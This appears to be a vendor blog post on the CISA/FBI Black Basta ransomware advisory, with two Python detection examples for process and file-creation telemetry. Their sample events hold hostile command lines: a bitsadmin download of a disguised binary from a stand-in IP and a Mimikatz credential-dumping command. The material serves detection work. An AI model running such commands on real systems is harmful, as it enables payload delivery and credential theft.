Black Basta Activity Detection: FBI, CISA & Partners Warn of Increasing Ransomware Attacks Targeting Critical Infrastructure Sectors, Including Healthcare

May 13, 2024 · 4 min read

As of May 2024, Black Basta ransomware operators have breached over 500 organizations worldwide. In response to the escalating threat, the FBI, CISA and partner cybersecurity agencies in the U.S. and abroad have issued a joint cybersecurity advisory warning defenders of the group’s increasing activity, which has already affected dozens of critical infrastructure organizations, including the healthcare sector.

Detecting Black Basta Ransomware Infections

With over 300 million ransomware attack attempts detected in 2023 alone, ransomware remains one of the top challenges for cyber defenders. Although Black Basta RaaS is a relatively new player in the cyber arena, the financially motivated collective has already impacted hundreds of high-profile organizations worldwide.

To stay proactive and detect possible attacks at the earliest stages, security professionals can consult the latest CSA alert detailing Black Basta TTPs and tooling. Additionally, cybersecurity practitioners can rely on the SOC Prime Platform for collective cyber defense, which offers a set of curated Sigma rules addressing the attack methods described in the AA24-131A advisory. Just hit the Explore Detections button to drill down to the relevant detection stack.

All the rules are compatible with 30+ SIEM, EDR, and Data Lake technologies and mapped to the MITRE ATT&CK® framework v14.1. Additionally, detections are enriched with extensive metadata, including CTI links, ATT&CK references, attack timelines, and more.

Security professionals seeking additional context on Black Basta TTPs and eager to analyze attacks retrospectively can search for more related Sigma rules in the Threat Detection Marketplace using the “Black Basta” tag.

Black Basta Ransomware Attack Analysis

Black Basta threat actors have been in the spotlight since at least spring 2022, operating as a RaaS and primarily targeting enterprises and critical infrastructure organizations in North America, Europe, and Australia. According to the joint Cybersecurity Advisory AA24-131A, over two years of activity the group has affected more than 500 organizations across the world, which underscores the need for increased cybersecurity awareness and proactive defensive measures.

FBI, CISA, and partners have shared insights on the ongoing ransomware attacks, with at least a dozen critical infrastructure entities, including healthcare organizations, exposed to data encryption and exfiltration by the adversaries.

For initial access, Black Basta commonly leverages phishing and exploits known security flaws. The adversaries then employ a double-extortion approach, both encrypting systems and exfiltrating data. Rather than sending an initial ransom demand or payment instructions, Black Basta provides victims with a unique code and prompts them to contact the ransomware group via a custom URL accessible through the Tor browser.

For network scanning, Black Basta employs tools like SoftPerfect Network Scanner (netscan.exe), and for reconnaissance the adversaries commonly run utilities saved under seemingly harmless file names, such as Intel or Dell.

To move laterally across compromised networks, Black Basta affiliates rely on utilities like BITSAdmin, PsExec, and RDP. They can also leverage Splashtop, ScreenConnect, and Cobalt Strike beacons for remote access. For privilege escalation, Black Basta uses credential-scraping utilities like Mimikatz and can also exploit known vulnerabilities, for instance ZeroLogon, CVE-2021-42287, or PrintNightmare.
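The tooling listed in the two paragraphs above (netscan.exe, binaries named Intel or Dell, BITSAdmin, PsExec, Mimikatz) all shows up in process-creation telemetry, which is exactly where Sigma rules for it live. The following is an added example written for this post, not SOC Prime's rule content or anything from the advisory: a minimal Sigma-style matcher (field conditions AND-ed, list values OR-ed, with the `endswith`/`contains`/`startswith` modifiers) run over constructed Sysmon Event ID 1 records. All paths, hosts and the TEST-NET address are made up, and the Intel/Dell rule is a heuristic assumption about "vendor-looking binary outside a vendor path", not something the advisory states.

```python
"""Sigma-style process-creation matching for Black Basta tooling (added example)."""
from typing import Any

# Constructed sample events in the shape of Sysmon EID 1 (ProcessCreate). Not real telemetry.
SAMPLE_EVENTS: list[dict[str, Any]] = [
    {"Image": r"C:\Users\jdoe\Downloads\netscan.exe",
     "CommandLine": "netscan.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer upd /download /priority high "
                    "http://198.51.100.7/dell.exe C:\\ProgramData\\Dell\\dell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": r"C:\Windows\PSEXESVC.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\ProgramData\Dell\dell.exe",
     "CommandLine": "dell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Temp\m.exe",
     "CommandLine": "m.exe privilege::debug sekurlsa::logonpasswords exit",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",  # benign control
     "CommandLine": '"WINWORD.EXE" /n report.docx',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Rules mirror the Sigma layout: a "selection" that must match and an optional
# "filter" that, when it matches, suppresses the hit. Matching is case-insensitive.
RULES: list[dict[str, Any]] = [
    {"title": "SoftPerfect NetScan execution",
     "tags": ["attack.discovery", "attack.t1046"],
     "selection": {"Image|endswith": [r"\netscan.exe"]}},
    {"title": "BITSAdmin transfer job",
     "tags": ["attack.defense_evasion", "attack.t1197"],
     "selection": {"Image|endswith": [r"\bitsadmin.exe"],
                   "CommandLine|contains": ["/transfer"]}},
    {"title": "PsExec service binary started",
     "tags": ["attack.lateral_movement", "attack.t1569.002"],
     "selection": {"Image|endswith": [r"\psexesvc.exe"]}},
    {"title": "Mimikatz-style command line",
     "tags": ["attack.credential_access", "attack.t1003.001"],
     "selection": {"CommandLine|contains": ["sekurlsa::", "lsadump::"]}},
    # Heuristic assumption (not from the advisory): a binary named like a hardware
    # vendor that runs from somewhere other than Program Files or Windows.
    {"title": "Intel/Dell-named binary from a non-vendor path",
     "tags": ["attack.defense_evasion", "attack.t1036.005"],
     "selection": {"Image|endswith": [r"\intel.exe", r"\dell.exe"]},
     "filter": {"Image|startswith": [r"c:\program files", r"c:\windows"]}},
]


def _field_matches(event: dict[str, Any], key: str, patterns: list[str]) -> bool:
    """One Sigma field condition: 'Field|modifier': [values] (values are OR-ed)."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    for pattern in patterns:
        p = pattern.lower()
        if modifier == "endswith" and value.endswith(p):
            return True
        if modifier == "startswith" and value.startswith(p):
            return True
        if modifier == "contains" and p in value:
            return True
        if modifier == "" and value == p:
            return True
    return False


def _block_matches(event: dict[str, Any], block: dict[str, list[str]]) -> bool:
    """All field conditions in a selection/filter block must hold (AND)."""
    return all(_field_matches(event, k, v) for k, v in block.items())


def match_rules(event: dict[str, Any], rules: list[dict[str, Any]] = RULES) -> list[str]:
    """Return the titles of every rule whose selection matches and whose filter does not."""
    hits = []
    for rule in rules:
        if not _block_matches(event, rule["selection"]):
            continue
        if "filter" in rule and _block_matches(event, rule["filter"]):
            continue
        hits.append(rule["title"])
    return hits


def scan(events: list[dict[str, Any]] = SAMPLE_EVENTS,
         rules: list[dict[str, Any]] = RULES) -> dict[int, list[str]]:
    """Map event index -> matching rule titles, for events that fired at least one rule."""
    return {i: hits for i, e in enumerate(events) if (hits := match_rules(e, rules))}


if __name__ == "__main__":
    for idx, titles in scan().items():
        print(f"[{idx}] {SAMPLE_EVENTS[idx]['Image']} -> {', '.join(titles)}")
```

The five suspicious events each fire exactly one rule and the Word launch fires none; note that the BITSAdmin event mentions `dell.exe` only in its command line, so the vendor-name heuristic correctly stays quiet there and fires only when the renamed binary itself executes from ProgramData.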

The Black Basta ransomware group uses RClone to exfiltrate data from compromised systems. Prior to exfiltration, the affiliates evade detection by disabling security tooling via PowerShell and the Backstab utility. They then encrypt files using the ChaCha20 algorithm with an RSA-4096 public key, append a random file extension, and drop a ransom note titled readme.txt while hindering system recovery.
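The encryption stage described above leaves two file-system signals that do not depend on knowing the malware binary: a burst of new files that all carry one extension the host has never seen before, and the same readme.txt name appearing across many directories. The following is an added example written for this post (not SOC Prime's or the advisory's code) that scores both signals over a constructed stream of Sysmon Event ID 11 (FileCreate) records; the host name, directories, the extension `.q8wz3` and the thresholds are all assumptions chosen for the demonstration.

```python
"""File-create burst detection for a ransomware encryption run (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Any

# Extensions considered normal on the monitored host (assumed baseline).
BASELINE_EXTS = {".docx", ".xlsx", ".pptx", ".pdf", ".txt", ".log"}
NOTE_NAME = "readme.txt"  # ransom note name stated in the advisory


def build_sample_events() -> list[dict[str, Any]]:
    """Constructed FileCreate events: some normal document writes, then an encryption run.

    Everything here is made up; the time base, directories and share name are not real.
    """
    base = datetime(2024, 5, 13, 9, 0, 0)
    dirs = [r"C:\Users\jdoe\Documents", r"C:\Users\jdoe\Desktop",
            r"\\fs01\share\finance", r"\\fs01\share\hr"]
    events = []
    # Benign activity: a few ordinary documents over 50 seconds.
    for i in range(5):
        events.append({"UtcTime": (base + timedelta(seconds=10 * i)).isoformat(),
                       "TargetFilename": f"{dirs[0]}\\report{i}.docx"})
    # Encryption run: 120 files rewritten with one never-seen extension in 30 seconds,
    # keeping the original name (file.xlsx -> file.xlsx.q8wz3).
    for i in range(120):
        events.append({"UtcTime": (base + timedelta(seconds=100 + 0.25 * i)).isoformat(),
                       "TargetFilename": f"{dirs[i % 4]}\\file{i}.xlsx.q8wz3"})
    # Ransom note dropped into every touched directory at the end.
    for d in dirs:
        events.append({"UtcTime": (base + timedelta(seconds=131)).isoformat(),
                       "TargetFilename": f"{d}\\{NOTE_NAME}"})
    return events


def _split(path: str) -> tuple[str, str]:
    """Windows path -> (directory, file name); str.rsplit so it also works on a Linux analyst box."""
    directory, _, name = path.rpartition("\\")
    return directory.lower(), name.lower()


def _extension(name: str) -> str:
    return name[name.rfind("."):] if "." in name else ""


def detect_encryption_burst(events: list[dict[str, Any]],
                            baseline_exts: set[str] = BASELINE_EXTS,
                            window: timedelta = timedelta(seconds=60),
                            min_files: int = 50,
                            min_note_dirs: int = 3) -> list[dict[str, Any]]:
    """Return alerts for (1) >= min_files creations sharing a novel extension inside `window`
    and (2) the ransom note name appearing in >= min_note_dirs distinct directories."""
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e["UtcTime"]))
    novel_stamps: dict[str, list[datetime]] = defaultdict(list)
    note_dirs: set[str] = set()

    for e in ordered:
        ts = datetime.fromisoformat(e["UtcTime"])
        directory, name = _split(e["TargetFilename"])
        if name == NOTE_NAME:
            note_dirs.add(directory)
        ext = _extension(name)
        if ext and ext not in baseline_exts:
            novel_stamps[ext].append(ts)

    alerts: list[dict[str, Any]] = []
    for ext, stamps in novel_stamps.items():
        # Largest number of creations of this extension inside any sliding window.
        best, start = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_files:
            alerts.append({"signal": "novel_extension_burst", "extension": ext,
                           "files_in_window": best})
    if len(note_dirs) >= min_note_dirs:
        alerts.append({"signal": "ransom_note_spread", "note": NOTE_NAME,
                       "directories": len(note_dirs)})
    return alerts


if __name__ == "__main__":
    for alert in detect_encryption_burst(build_sample_events()):
        print(alert)
```

Both thresholds are deliberately conservative: a single user renaming files to an odd extension will not reach 50 in a minute, and a note name as generic as readme.txt only becomes interesting when it lands in several directories within one run, which is why the two signals are better raised together than alone.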

Due to their size, heavy reliance on technology, and access to sensitive data, healthcare organizations remain appealing targets for the Black Basta ransomware gang. To reduce the risk of breaches, the advisory authors recommend that critical infrastructure organizations install all required software and firmware updates, enforce multifactor authentication, secure remote access tools, and maintain backups of critical systems and device configurations to facilitate recovery. CISA and partners also recommend applying the general mitigations in the #StopRansomware Guide to reduce the likelihood and impact of ransomware attacks and data extortion.

With the increasing attacks attributed to Black Basta and other ransomware affiliates targeting critical infrastructure organizations, it’s vital to continuously bolster cyber vigilance and fortify defenses. With SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting & Detection Stack Validation, defenders can minimize the risks of intrusions and maximize the value of security investments.
